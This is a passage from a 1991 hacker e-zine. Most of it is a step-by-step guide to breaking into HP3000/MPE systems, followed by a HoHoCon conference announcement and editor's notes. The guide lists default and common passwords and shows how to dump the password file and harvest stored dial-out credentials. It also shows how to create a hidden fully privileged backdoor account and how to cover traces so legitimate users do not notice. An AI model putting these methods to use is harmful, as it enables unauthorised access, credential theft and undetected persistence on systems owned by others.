OPERATOR.SYS,PUB ENTER ACCOUNT PASSWORD:CASPER ENTER USER PASSWORD:EMERALD Example 2 ^^^^^^^^^ :HELLO OPERATOR/EMERALD.SYS/CASPER, PUB The latter of these two methods is best, because it will allow multiple failures on different accounts while the first will disconnect after multiple invalid attempts on one account. Account Structure ^^^^^^^^^^^^^^^^^ The account structure is split into four groups and is formatted thusly; Sessionsname,Username.AccountName,Groupname The session name and group name can be omitted for logon in most cases. If, however a message at account login states, "NO HOME GROUP FOR USER...", a group name then must be specified for that account. The default groupname is: PUB Logging into an HP3000 ^^^^^^^^^^^^^^^^^^^^^^ HELLO [SESSIONNAME,]USERNAME[/USERPASS].ACCTNAME[/ACCTPASS][,GROUPNAME[/GROUPPASS]] for example HELLO LOSERS, FIELD.SUPPORT/SUSAN,PUB/SECRET The above would log you into session LOSERS under the user FIELD and account SUPPORT with password SUSAN under the group PUB with password SECRET. Although this appears difficult, it is merely a formal example. In reality users are never passworded; the same goes for accounts. The only part of the HP that ever seems to be passworded is groups; and no group password is needed to get in, since there are many ways around it. To logon to an HP3000, logon in the following manner: HELLO USERNAME.ACCTNAME,GROUPNAME To hack the operators account, type: HELLO OPERATOR.SYS,PUB HELLO is the command on the HP3000 that begins an interactive session. Occasionally the HP3000 will appear to be slow or pause and break repeatedly; select a terminal type to remedy this situation. The primary terminal types are 9, 10, and 18. A finer point under the MPE XL operating system only 10 and 18 apply unless other terminal types have been established with the Workstation Configurator Utility (This is not important just trivial). To hasten the process, logon similiarly: HELLO OPERATOR.SYS,PUB;TERM=9 HP3000 Defaults Passwords and Common Passwords ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ The following is a list of the primary defaults and common account passwords. Most Common and Default Passwords ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HPONLY (Almost always Telesup account Password) ONLYHP NEW HPUSER PASS PASSWORD Here is a secondary list of passwords. Mainly on the HP3000 you will find names to be the most common password. Secondary Password List ^^^^^^^^^^^^^^^^^^^^^^^ $MONEY 123ABC ABC123 ADMIN AGNES ALYCE AMY APASS ASDF BARBAR BEER BELL BETTY BILL BOB BRUCE BRUTE BUDGET BUG BURDEN CARL CAROL CARROT CARTER CENTER CHARLIE CHICK CINDI CNTL COKE CONDOM CONNIE CONTROL CORRECT COW DATAPAC DAVE DAVID DEANNE DIAG DOC DON DONNA DONOR DOS EAST ELAINE ELISA ELLYCE ENTRY FALCON FIELD FUN FUZZ GENE GINA GLENN GONE GRAPHICS GREG GUIDED HAND HAROLD HEALTH HERMIT HOLD HOT HOTSTUFF INSIGHT JACKIE JENNI JOGGING JOHN JUDY KATHY KELLY KITTY LARRY LESLIE LINDA LISA LITTLE LOIS LOUISE LOVE MAESTRO MARCIA MARY MARY MIKE MODEM MONEY MYRTLE NELSON NET NETWORK NEW NORTH PAGAN PASS01 PATT PEPSI PETER PHIL PROD QUASAR QUEST QWERTY REMOTE RESULT ROLLO RUBBER RUNNING SAFE SAFESEX SAFETY SAILING SALLY SAM SANDY SCOTT SEA SECRET SECURITY SOUP SOUTH STEER STEVE TAPES TEACH TECH TELENET TEMP TEST TEST1 THISTL TODD TOOTIE TOOTSIE TOUR TYMNET USER USERPASS VICTOR VIVIAN WASH WAVE WEST WIDGET XYZ ============================================== Manipulating, Utilizing, and Raping the HP3000 ============================================== There are 5 things to do once you are inside your HP3000 to ensure continued access and prosperity. The canonistic approach to take is: Five Points of Interest ^^^^^^^^^^^^^^^^^^^^^^^ Check to See Who is on the System ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ To check who is the HP3000, simply type: SHOWJOB Pulling NUA's of Systems Networked with your HP3000 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ To pull the NUA's of the systems your HP3000 is networked with, type: RUN NETCONF.PUB.SYS After running this program, type list and a list of NUA's and parameters will appear. Grabbing the Password File ^^^^^^^^^^^^^^^^^^^^^^^^^^ To grab the entire password file, turn on the buffer and type: LISTUSER @.@ This will list all of the users and passwords, there accounts they are under, and the accounts password. On MPE XL OS you will have to issue a... LISTUSER @.@ ;PASS Check for Telamon Software ^^^^^^^^^^^^^^^^^^^^^^^^^^ To check for Telamon Software do this: LISTF @.@.TELAMON,1 An error or a listing will be released if Telamon Software is on the system. Telamon is networking software that allows HP3000's to dialout via the nets to; Dow Jones, Compuserve, Dialog, Easylink, etc... By looking through the Telamon files NUI and passwords to these systems can be obtained. The passwords are usually stored in easily recognizable files (i.e. EASYPW would be thier EASYLINK password.) NUI's they can usually be pulled out of AUTODIAL. Creating an Account and User and Account/User Parameters ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ The next step to do is create an account and user ID for yourself; according to the following command. NEWACCT HACK,MALEF;PASS=MALEF;CAP=SM,AM,AL,GL,DI,OP,NA,NM,SF,ND,UV,CV,CS,PS, LG,PH,DS,MR,PM Explanation of above... NEWACCT = Command to create account HACK = Accountname MALEF = Manager of the account HACK PASS=MALEF = Sets the account password to RBOCR ; = Parameters Separator CAP=Whatever = This is the capabilities listing of the account see chart below. Capabilities Listing -=-=-=-=-=-=-=-=-=-= System Manager = SM Account Manager = AM Account Librarian = AL Group Librarian = GL Diagnostician = DI System Supervisor = OP Network Administrator = NA Node Manager = NM Save Files = SF Access to Nonshareable I/O Devices = ND Use Volumes = UV Create Volumes = CV Use Communication Subsystem = CS Programmatic Sessions = PS User Logging = LG Process Handling = PH Extra Data Segments = DS Multiple RINs = MR Priveleged Mode = PM Interactive Access = IA Batch Access = BA One last task remains type; ALTUSER MALEF.HACK;HOME=PUB;PASS=RBOCR;CAP=SM,AM,etc... Explanation of above: ALTUSER = Command to modify user MALEF = Username to be modified HACK = Account that user is in HOME=PUB = Sets users home group to pub PASS=RBOCR = This sets users password to RBOCR CAP=SM,AM... = This is the Capabilities of the User ; = Parameters Seperator The capabilities listings for both the user and the account are identical. Briefly mentioned here are a few more commands. NEWUSER (Creates New user) 1 ALTUSER (Modifies User) 1 PURGEUSER (Deletes User) 1 NEWACCT (Creates New Account) 2 ALTACCT (Modifies Account) 3 PURGEACCT (Deletes Account) 3 NEWGROUP (Creates New group) 4 ALTGROUP (Modifies Group) 4 PURGEGROUP (Deletes Group) 4 All of these commands with the exception of the purge command work in the same fashion. Here is a general algorithm for their use with the numbers corresponding to the operation: COMMAND USER.ACCT/ACCT,USER/ACCT/GROUP.ACCT;PARMS;PARMS;PARMS 1 2 3 4 The only other exception that is of concern is the difference between user + account capabilities and group capabilities. The group capabilities are differant and below follows a list. Group Capabilities -=-=-=-=-=-=-=-=-= Process Handling = PH Extra Data Segments = DS Multiple RN's = MR Priveleged Mode = PM Interactive Access = IA Batch Access = BA It is neccessary to be cognizant of the fact rules regarding accounts, users, and groups. A User's capabilities cannot exceed the accounts capabilities for example a user cannot have SM privelege if the account doesn't have SM privelege, the same applies to groups. A group cannot have PM privelege if the account doesn't have PM privelege. However, just because an account has SM privelege doesn't mean a user automatically gets SM privelege and the same goes for groups. User Defined Commands (UDC's) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ User defined commands are self-explanatory, and are user defined commands. These commands are stored in catalogs throughout the system. An HP3000 may have multiple catalogs each with different commands. To list the commands type: SHOWCATALOG This will print out a listing of commands for furthur information on a particular command type: HELP command To execute a particular command, type the command's name. i.e. SJ (Note: SJ is a commonly found UDC that is showjob just shortened to SJ) UDC's can be found under almost any account on the HP3000 and are usually named XXXUDC or SYSUDC or UDC1 etc... To peruse other UDC files that may have nice commands you can add them to your existing catalog like so... SETCATALOG SYSUDC.PUB.SYS;APPEND Explanaiton of above: SYSUDC = The UDC file PUB = The group the UDC file is located in SYS = The account the UDC file is located in ; = Parameter Separator APPEND = Adds UDC file to existing UDC file w/o overwriting it However this only works on MPE XL and not MPE to add another catalog on MPE you will have to type: SETCATALOG SYSUDC.PUB.SYS There isn't much of a differance to complain of, but always remember to reset the catalog to what it formally was before you began fucking with it. I cannot stress this fact enough if the legitemate user notices a differant UDC catalog (which he will unless he is ray charles) then the system will be alerted to intrusion. UDC can also have lockwords these are stored in command.pub.sys and can be pulled from there or are in a listf @.group.account,-2 or a listf @.group.account,-3 depending on the MPE version you are under. Creating UDC's is very simple go to the editor and follow the format... SJ showjob *** That is the format for the showjob command. This is how UDC files are created simply the UDC command;MPE command;***. There are a few minimal parameters to take into account and options. Today we will deal only with the options. LOGIN - Command executes at login NOLOGIN - Standard format doesn't execute at login (default) HELP - Help for udc (default) NOHELP - This won't give help for UDC BREAK - Can break out of command (default) NOBREAK - Can't break out of command LIST - Error reporting with ^ NOLIST - No error reporting (default) SJ OPTION LOGIN SHOWJOB **** What follows now is a standard UDC file I use slightly modified for general public use, but still nonetheless useful. Here is how to do it and set it word for word. This is basically a unix command crossover for HP3000. SETCATALOG EDITOR /A sj option login showjob *** who showjob *** rm purge *** ls listf *** cd chgroup *** cp fcopy *** date showtime *** time showtime *** wall warn *** write tell *** deluser purgeuser *** chmod altsec *** // /K MALEUDC EXIT SETCATALOG MALEUDC Now your done. Files, Directories, and Parameters ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ I will begin this section with two listings of file codes with both the Integer value and the Mnemonic. These are charts to be used for referance and will come in handy. File Codes for MPE ^^^^^^^^^^^^^^^^^^ Integer Mnemonic Meaning ------------------------------------------------------------------------------- 1024 USL User Subprogram Library 1025 BASD BASIC Data 1026 BASP BASIC Program 1027 BASFP BASIC Fast Program 1028 RL Relocatable Library 1029 PROG Program file 1030 NMPRG Native Mode Program file 1031 SL Segmented Library 1032 NMSL Native Mode Executable Library file 1033 NMRL Native Mode Relocatable Library file 1035 VFORM View Form file 1036 VFAST View Fast Forms file 1037 VREF View Reformat file 1040 XLSAV Cross Loader ASCII file (SAVE) 1041 XLBIN Cross Loader Relocated Binary file 1042 XLDSP Cross Loader ASCII file (DISPLAY) 1050 EDITQ Edit Quick file 1051 EDTCQ Edit KEEPQ file (COBOL) 1052 EDTCT Edit TEXT file (COBOL) 1054 TDPDT TDP Diary file 1055 TDPQM TDP Proof Marked QMARKED 1056 TDPP TDP Proof marked non-COBOL file 1057 TDPCP TDP Proof Marked COBOL file 1058 TDPQ TDP Workfile 1059 TDPXQ TDP Workfile (COBOL) 1060 RJEPN RJE Punch file 1070 QPROC QUERY Procedure file 1080 KSAMK KSAM Key file 1083 GRAPH GRAPH Specification file 1084 SD Self-describing file 1090 LOG User Logging logfile 1100 WDOC HPWORD Document 1101 WDICT HPWORD Hyphenation dictionary 1102 WCONF HPWORD Configuration file 1103 W2601 HPWORD Attended Printer Environment 1110 PCELL IFS/3000 Character Cell file 1111 PFORM IFS/3000 Form file 1112 PENV IFS/3000 Environment file 1113 PCCMP IFS/3000 Compiled Character Cell file 1114 RASTR Graphics Image in RASTR Format 1130 OPTLF OPT/3000 logfile 1131 TEPES TEPE/3000 Script file 1132 TEPEL TEPE/3000 logfile 1133 SAMPL APS/3000 logfile 1139 MPEDL MPEDCP/DRP logfile 1140 TSR HPToolset Root file 1141 TSD HPToolset Data file 1145 DRAW Drawing File for HPDRAW 1146 FIG Figure File for HPDRAW 1147 FONT Reserved 1148 COLOR Reserved 1149 D48 Reserved 1152 SLATE Compressed SLATE file 1153 SLATW Expanded SLATE workfile 1156 DSTOR Store file for RAPID/3000 Utility DICTDBU 1157 TCODE Code file for Transact/3000 Compiler 1158 RCODE Code file for Report/3000 Compiler 1159 ICODE Code file for Inform/3000 Compiler 1166 MDIST HPDESK Distribution list 1167 MTEXT HPDESK Text 1168 MARPA ARPA Message file 1169 MARPD ARPA Distribution list 1170 MCMND HPDESK Abbreviated Commands file 1171 MFRTM Reserved 1172 Reserved 1173 MEFT Reserved 1174 MCRPT Reserved 1175 MSERL Reserved 1176 UCSF Reserved 1177 TTYPE Term Type file 1178 TVFC Term Vertical Format Control file 1192 NCONF Network Configuration file 1193 NTRAC Network Trace file 1194 NLOG Network logfile 1195 MIDAS Reserved 1211 ANODE Reserved 1212 INODE Reserved 1213 INVRT Reserved 1214 EXCEP Reserved 1215 TAXON Reserved 1216 QUERF Reserved 1217 DOCDR Reserved 1226 VC VC file 1227 DIF DIF file 1228 LANGD Language Definition file 1229 CHARD Character Set Definition File 1230 MGCAT Formatted Application Message Catalog 1236 BMAP Reserved 1242 BDATA Basic Data file 1243 BFORM Basic Field Order File for VPLUS 1244 BSAVE Basic Saved Program file 1245 BCNFG Config. File for Default Option Basic Program 1246 BKEY Function Key Definition file 1258 PFSTA Pathflow STATIC file 1259 PFDYN Pathflow DYNAMIC file 1270 RTDCA Revisable Form DCA Document* 1271 FFDCA Document Interchange Unit file HPWORD/150 1272 DIU DISOSS Filing Information file 1273 PDOC Search Result Information file 1275 DFI Reserved 1276 SRI HPMAP/3000 Map Specification file 1401 CWPTX Reserved 1421 MAP Reserved 1422 GAL HPBRW Dictionary file 1425 TTX HPBRW Specification file 1428 RDIC HPBRW Specification file (frozen) 1429 RSPEC HPBRW Execution file 1430 RSPCF HPBRW Report Job file 1431 REXEC HPBRW Intermediate Report file 1432 RJOB HPBRW Dictionary Output file 1433 ROUTI HPBRW Print file 1434 ROUTD HPBRW Configuration file 1435 PRINT Reserved 1436 RCONF Native Mode Object file 1441 PIF PASCAL Source Library 1461 NMOBJ Reserved 1462 PASLB PASCAL Source Library 3333 Reserved File Codes for MPE XL ^^^^^^^^^^^^^^^^^^^^^ Integer Mnemonic Meaning ------------------------------------------------------------------------ 1024 USL User Subprogram Library 1025 BASD Basic Data 1026 BASP Basic Program 1027 BASFP Basic Fast Program 1028 RL Compatibility Mode Relocatable Library 1029 PROG Compatibility Mode Program File 1030 NMPROG Native Mode Program File 1031 SL Segmented Library 1032 NMXL Native Mode Executable Library 1033 NMRL Native Mode Relocatable Library 1035 VFORM VPLUS Forms File 1036 VFAST VPLUS Fast Forms File 1037 VREF VPLUS Reformat File 1040 XLSAV Cross Loader ASCII File (SAVE) 1041 XLBIN Cross Loader Relocated Binary File 1042 XLDSP Cross Loader ASCII File (DISPLAY) 1050 EDITQ Edit Quick File 1051 EDTCQ Edit KEEPQ File (COBOL) 1052 EDTCT Edit TEXT File (COBOL) 1054 TDPDT TDP Diary File 1055 TDPQM TDP Proof Marked QMARKED 1056 TDPP TDP Proof Marked non-COBOL File 1057 TDPCP TDP Proof Marked COBOL File 1058 TDPQ TDP Work File 1059 TDPXQ TDP Work File (COBOL) 1060 RJEPN RJE Punch File 1070 QPROC QUERY Procedure File 1080 KSAMK KSAM Key File 1083 GRAPH GRAPH Specification File 1084 SD Self-describing File 1090 LOG User Logging Log File 1100 WDOC HPWORD Document 1101 WDICT HPWORD Hyphenation Dictionary 1102 WCONF HPWORD Configuration File 1103 W2601 HPWORD Attended Printer Environment 1110 PCELL IFS/3000 Character Cell File 1111 PFORM IFS/3000 Form File 1112 PENV IFS/3000 Environment File 1113 PCCMP IFS/3000 Compiled Character Cell File 1114 RASTR Graphics Image in RASTER Format 1130 OPTLF OPT/3000 Log File 1131 TEPES TEPE/3000 Script File 1132 TEPEL TEPE/3000 Log File 1133 SAMPL APS/3000 Log File 1139 MPEDL MPEDCP/DRP Log File 1140 TSR HPToolset Root File 1141 TSD HPToolset Data File 1145 DRAW Drawing File for HPDRAW 1146 FIG Figure File for HPDRAW 1147 FONT Reserved 1148 COLOR Reserved 1149 D48 Reserved 1152 SLATE Compressed SLATE File 1153 SLATW Expanded SLATE Work File 1156 DSTOR RAPID/3000 DICTDBU Utility Store File 1157 TCODE Code File for Transact/3000 Compiler 1158 RCODE Code File for Report/3000 Compiler 1159 ICODE Code File for Inform/3000 Compiler 1166 MDIST HPDESK Distribution list 1167 MTEXT HPDESK Text 1168 MARPA ARPA Messages File 1169 MARPD ARPA Distribution List 1170 MCMND HPDESK Abbreviated Commands File 1171 MFRTM HPDESK Diary Free Time List 1172 None Reserved 1173 MEFT HPDESK External File Transfer Messages File 1174 MCRPT HPDESK Encrypted Item 1175 MSERL HPDESK Serialized (Composite) Item 1176 VCSF Version Control System File 1177 TTYPE Terminal Type File 1178 TVFC Terminal Vertical Format Control File 1192 NCONF Network Configuration File 1193 NTRAC Network Trace File 1194 NTLOG Network Log File 1195 MIDAS Reserved 1211 NDIR Reserved 1212 INODE Reserved 1213 INVRT Reserved 1214 EXCEP Reserved 1215 TAXON Reserved 1216 QUERF Reserved 1217 DOCDR Reserved 1226 VC VC File 1227 DIF DIF File 1228 LANGD Language Definition File 1229 CHARD Character Set Definition File 1230 MGCAT Formatted Application Message Catalog 1236 BMAP Base Map Specification File 1242 BDATA BASIC Data File 1243 BFORM BASIC Field Order File for VPLUS 1244 BSAVE BASIC Saved Program File 1245 BCNFG Configuration File for Default Option BASIC Program 1246 BKEY Function Key Definition File for Terminal 1247 BSVXL Business Basic/XL Program File 1248 BDTXL Business Basic/XL Data File 1249 BDNCM Business Basic/V Binary File 1258 PFSTA Pathflow Static File 1259 PFDYN Pathflow Dynamic File 1270 RFDCA Revisable Form DCA Data Stream 1271 FFDCA Final Form DCA Data Stream 1272 DIU Document Interchange Unit File 1273 PDOC HPWORD/150 Document 1275 DFI DISOSS Filing Information File 1276 SRI Search Restart Information File 1401 CWPTX Chinese Word Processor Text File 1421 MAP HPMAP/3000 Map Specification File 1422 GAL Reserved 1425 TTX Reserved 1428 RDIC HP Business Report Writer (BRW) Dictionary File CM 1429 RSPEC BRW Specification File 1430 RSPCF BRW Specification File 1431 REXEC BRW Execution File 1432 RJOB BRW Report Job File 1433 ROUTI BRW Intermediate Report File 1434 ROUTD BRW Dictionary OUTPUT 1435 PRINT BRW Print File 1436 RCONF BRW Configuration File 1437 RDICN BRW NM Dictionary File 1438 REXNM BRW NM Execution File 1441 PIF Reserved 1461 NMOBT Native Mode Object File 1462 PASLB Pascal Source Library 1476 TIFF TAG Image File Format 1477 RDF Revisable Document Format 1478 SOF Serial Object File 1479 GPH Chart File for Charting Gallery Chart 1480 GPD Data File for Charting Gallery Chart 1483 VCGPM Virtuoso Code Generator Proccessed Micro File 1484 FRMAT Formatter 1485 DUMP Dump Files Created and used by IDAT and DPAN 1486 NWMD0 New Wave Mail Distribution List 1491 X4HDR X.400 Header for HPDesk Manager 1500 WP1 Reserved 1501 WP2 Reserved 1502 LO123 Lotus 123 Spread Sheet 1514 FPCF Form Tester Command Spec File 1515 INSP Spooler XL Input Spool File 1516 OUTSP Spooler XL Output Spool File 1517 CHKSP Spooler XL Checkpoint File 1521 DSKIT HPDesk Intrinsics Transaction File 1526 MSACK Mail Server Acknowledgement 1527 MSNDN Mail Server Non-Delivery Notification 1528 MSTRC Mail Server Trace File 3333 Reserved Briefly I would like to explain the directory structure under MPE. The structure is very bizarre, but not as bad as VMS. In MPE you have accounts and groups, the groups are sub-directories so to speak of, of the accounts. The accounts are separate entities in that one account cannot be directly logged to from another account. For example if you are under the SYS account you can look at files in the COGNOS account, but you cannot change directories to the COGNOS account. The account you start off in is your working account/ directory. (Note: There is no true directory structure under MPE, but the allegory may help out some readers.) The same principle holds true most of the time for groups except under the latter versions of MPE XL where a CHGROUP command has been added. This command allows you to change groups. i.e. CHGROUP PRIVATE/SECRET Explanation of above ^^^^^^^^^^^^^^^^^^^^ chgroup = The command to change groups private = The group name switched to / = separator secret = This is the password to the group private This is simple enough and really needed no explanation, but we need to be christian even to the slow ones. The next most important command is listf this will give a files listing and has various differant combinations and parameters, but I wont go into it basically there are 3 parameters you need to know. LISTF @.@.@,-3 Explanation of Above (needed) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ LISTF = Command to list files @ = 1st @ is the wildcard in the file specification slot @ = 2nd @ is the wildcard in the group specification slot @ = 3rd @ is the wildcard in the account specification slot , = separator -3 = parameter which will list the lockword on a file if any The other parameters are these -3 is for MPE XL only and will list the lockword if the file is password protected more on this later. The -2 specification will list the lockword under MPE. The 1 specification will list the account/group the file is under good for doing searches and getting more information. Examples of LISTF ^^^^^^^^^^^^^^^^^ LISTF @.PUB.SYS = lists all files in the group pub under the account sys LISTF LIST@.@.@,1 = will list all files and accounts/groups that thier in; that begin with the word list this is how you will have to search for a listfile or listtext program since MPE doesn't provide one for you. Otherwise you won't be able to type text files to the screen. LISTF ?????UDC.@.ROBELLE,1 = this will search for anything beginning with 5 alphanumeric characters and ending with UDC under the account robelle the '?' is the wildcard for single alphanumerics. File Security Provisions ^^^^^^^^^^^^^^^^^^^^^^^^ ALTSEC is the command to modify RWX permissions on a file or device. To modify security on a file you would simply do the following. ALTSEC FILENAME;ACCESS=(RWX:CR;R:ANY) Explanation of Above ^^^^^^^^^^^^^^^^^^^^ ALTSEC = Command to modify security provisions FILENAME = The file simply ; = Separator ACCESS= = What you are specifying ( = Open Parenthesis for permissions RWX:CR = Read, Write, Execute for the creator R:ANY = Read any user ) = Close parenthesis for permissions This is basically simple enough below follows the mode types i.e. RWX, and a second chart for user types. Mode Types ========== R = Read W = Write X = Execute L = Lock A = Append Note: both lock and append privs' are granted with W (write) privelege. User Types ========== ANY = Any user AC = Account members only GU = Group members only AL = Account Librarian HP3000 EDIT/3000 ^^^^^^^^^^^^^^^^ The HP3000 editor basically sucks but it will always be there if you need it so here goes. :EDITOR Now you should be in the editor the commands that follow are the most useful a full editor command list will be in the end of this portion you can play with the others if you want to. ADD - Begins editing section this adds lines to an existing file or creates a new one. END - Exits the editor. KEEP - This saves your work format; "KEEP FILENAME". // - This puts you back into command mode. TEXT - This loads a file into the editor format; "TEXT FILENAME" LIST - This lists the file examples... 1. LIST X - lists x line number. 2. LIST X/Y - lists range of numbers x -> y. 3. LIST ALL - lists everything MODIFY - This modifies a line number see below for explanation. XPLAIN - Help on editor commands format; "XPLAIN MODIFY". DELETE - Deletes lines. JOIN - Imports/adds another text file to the existing file in memory. GATHER - Move lines and fix's line numbers. The HP3000 editor uses basic conventions with Delete, List, etc... in form listed above i.e. LIST 1, 2, and 3. These conventions apply to all commands where applicable. To insert lines in the middle of text you can add 6.1 or 6.01 or 6.001. Then use the gather command to resort the line numbers into integers. The modify command is very archaic to say the least for example their are three primary commands D, I, R which are Delete, Insert, Replace respectively; These commands are sub-commands of modify. Here is how it works... MODIFY X now let's say X says, "sakdfjs HAck or Dei" to correct this line we would do the following MODIFY X sakdfjs HAck or DEi d d (This deletes a range of letters) HAck or Dei ra (This replaces A with the letter a) Hack or Dei d (This deletes the i) Hack or De ii (This inserts an i) Now this is very painful and takes time to get used to, but I never said the editor was good. Many HP's have other editors besides EDIT/3000, but to explain them all would be too time-consuming. The best or my favorite is QEDIT which can be found in the robelle account if it is there. A nice shortcut is that editor commands can be abbreviated i.e. T filename as opposed to text filename. This makes it a little better, but not much. Screen Blanking ^^^^^^^^^^^^^^^ This is basically a stupid trick but a nice way to keep people from watching over your shoulder. Here is how it goes. ESC ; This makes everything you type not echo. --- Unfortunatly the finalized version of this file was wiped, therefore this is the shortened version. I didn't want to re-type the rest of it. It wouldn't meet the deadline. Malefactor! [Editors Note: The second part of this file should come out into a later issue. -JD ] / / / NIA073 / File 08 / / HoHoCon/XmasCon '91 / / Santa Claus / / / NIA & Phrack Magazine, & dFx International Digest Are Proud To Present: The Second Annual X M A S C O N Who: All Hackers, Journalists, Security Personnel, Federal Agents, Lawyers, Authors and Other Interested Parties. Where: Houston Airport Hilton Inn 500 North Belt East Houston, Texas 77060 U.S.A. Tel: (713) 931-0101 Fax: (713) 931-3523 When: Friday December 27 through Sunday December 29, 1991 Yes, ladies and gentlemen, you read it right... Xmascon has returned! This will undoubtedly be the telecom event of the year. Unlike certain conferences in the past, Xmascon 91 has a devoted and dedicated staff who are putting in an unmentionable ammount of time to ensure a large, vast and organized collection of some of the most diversified people in the telecommunications world. The event will be open to the public so that anyone may attend and learn more about the different aspects of computer security. Hotel Information ----------------- The Houston Airport Hilton Inn is located about 6 miles from Intercontinental Airport. The Xmascon group room rates are $49.00 plus tax (15%) per night, your choice of either single or double. There are also 7 suites availble, the prices of which vary from $140 to $250. You can call the hotel to find out the differences and availability of the suites, and you will also NEED to tell them you are with the Xmascon Conference to receive the reduced room rate, otherwise, you will be paying $69.00. There is no charge for children, regardless of age, when they occupy the same room as their parents. Specially designed rooms for the handicapped are available. The hotel provides free transportation to and from the airport, as well as neighbouring Greenspoint Mall, every 30 minutes on the hour, and on call, if needed. There are 2 restaurants in the hotel. The Wicker Works is open until 11:00 pm, and The Forty Love is open 24 Hours. There will also be breakfast, lunch and dinner buffets each day. There is a piano bar, The Cycle Club, as well as a sports bar, Chaps, which features numerous table games, large screen tv, and a disco with a DJ. Within the hotel compound, there are 3 pools, 2 of which are indoors, a jacuzzi, a miniature golf course, and a fully equipped health club which features universal weights, a whirlpool and sauna. A car rental agency is located in the hotel lobby, and you can arrange to pick your car up at either the airport or the hotel. Xmascon attendees are entitled to a discounted rate. Contact the hotel for more information. Xmascon will last 3 days, with the main conference being held on Saturday, December 28, in the Osage meeting room, starting at 12:00 p.m. and continuing on throughout the evening. This year, we have our own complete wing of the hotel, which is housed around a 3,000 square foot atrium ballroom. The wing is completely seperated from the rest of the hotel, so we are strongly encouraging people to make their reservations as far in advance as possible to enusre themselves a room within our area. Why To Contact Us, And How To Do It ----------------------------------- We are hoping to have a number of people speak on a varied assortment of topics. If you would like to speak, please contact us as soon as possible and let us know who you are, who you represent (if anyone), the topic you wish to speak on, a rough estimate of how long you will need, and whether or not you will be needing any audio-visual aids. There will be a display case inside the meeting room which will hold items of telecom interest. Specific items that will be available, or that we hope to have, include the first issues of 2600, Tap, Mondo 2000, and other magazines, non-computer related magazines that feature articles of interest, a wide array of boxes, the Quaker Oats 2600 mhz whistle, The Metal AE, etc. We will also have a VCR and monitor set up, so if you have any interesting videos (such as the Unsolved Mysteries show featuring Kevin Poulsen), or if you have anything you think people would enjoy having the chance to see, please let us know ahead of time, and tell us if you will need any help getting it to the conference. If all else fails, just bring it to the con and give it to us when you arrive. Media support has been very strong so far. Publications that have agreed to print pre-conference announcements and stories include Computer World, Info World, New York Times, San Francisco Chronicle, Austin Chronicle, Houston Chronicle, Independent Journal, Mondo 2000, CuD, Informatik, a leading Japanese computer magazine, NME, Regeneration (Germany), and a few other European based magazines. PBS stations WHNY, WNET, and KQED, as well as the stations that carry their syndicated shows, will be mentioning the conference also. If you are a journalist and would like to do a story on Xmascon 91, or know someone who would, contact us with any questions you may have, or feel free to use and reprint any information in this file. If anyone requires any additional information, needs to ask any questions, wants to RSVP, or would like to be added to the mailing list to receive the Xmascon updates, you may write to either myself (Drunkfux), Judge Dredd, or Lord Macduff via Internet at: nia@nuchat.sccsi.com Or via US Mail at: Hard Data Corporation ATTN: HoHo P.O. Box 60695 Houston, Texas 77205-9998 U.S.A. We will hopefully have an 800 mailbox before the next update is sent out. If someone cares to donate a decent one, that will stay up throughout the end of the year, please let us know. We should also be listing a few systems as an alternative form of reaching us. Xmascon 91 will be a priceless learning experience for professionals, and gives journalists a chance to gather information and ideas direct from the source. It is also one of the very few times when all the members of the computer underground can come together for a realistic purpose. We urge people not to miss out on an event of this caliber, which doesn't happen very often. If you've ever wanted to meet some of the most famous people from the hacking community, this may be your one and only chance. Don't wait to read about it in all the magazines, and then wish you had attended, make your plans to be there now! Be a part of our largest and greatest conference ever. Remember, to make your reservations, call (713) 931-0101 and tell them you're with Xmascon. "In closing... if you miss this one, you're only cheating yourself." -- Drunkfux ---cut here--- This is the famous HoHoCow, ** we know of no other cow which /\ costs so much to keep at HoHo. Our **** exclusive beechwood grazing produces (00) a Mooo-ability, smellabiltiy, and /-------\/ a milkability you will find in no / |h0h0 || other cow in any other state! * ||W---|| --The CowWeiser Creed ^^ ^^ Dadadadaa! Its H0H0C0W (wha'd ya'll 'spect? Yer comin' to Texas!) (C)Special SantaClausASCII Graphix ---cut here--- ---paste here--- ============================================================================= / / / NIA073/ File 09 / / Editor's Comments / / JD & LMcD / / / Well, another issue out the gateway here at NIA. Things have been rather hectic here, with the Xmascon planning, Lord Macduff's new baby and classes starting again. We hope you enjoy this issue, and look for another around the first of the new year. We'd like to take this chance to ask the readers for their submissions, questions comments, donations of used equipment, and anything else they may care to send. Please direct all items to nia@nuchat.sccsi.com. Back issues of NIA and first releases of new issues can be obtained from the CuD archive servers (Refer: CuD Magazine) ftp.cs.widener.edu and EFF archive server (Refer: EFF Magazine) eff.org. Also a bbs entitled Internal Affairs (HOUTX), TTR (TinselTown Rebellion Node 2 @ 713.952.7971), RipCo BBS (1.312.528.5020), Blitzkrieg (TAP) and the current Phrack home archives the magazine. I thank the contributers who have been sending in donations in the way of files, hardware, information and other things. Please keep on doing so. In addition, Len Rose has a fund, please contact EFF (Refer: eff@eff.org / 617.864.0665) to donate. We look forward to seeing all of you at HoHoCon, and urge you to make your reservations _now_. The hotel has been filling up quickly and there are only a few rooms left (Refer: NIA073 / File 07). "There's nothing worse than a bad haircut. You go around looking like a dork...half apologizing always self concious, totally out of your groove for about a week. But at least you're reading NIA." - C.N. 11/16/91 Keep The Faith, JD & LMcD Ignorance, There Is No Excuse.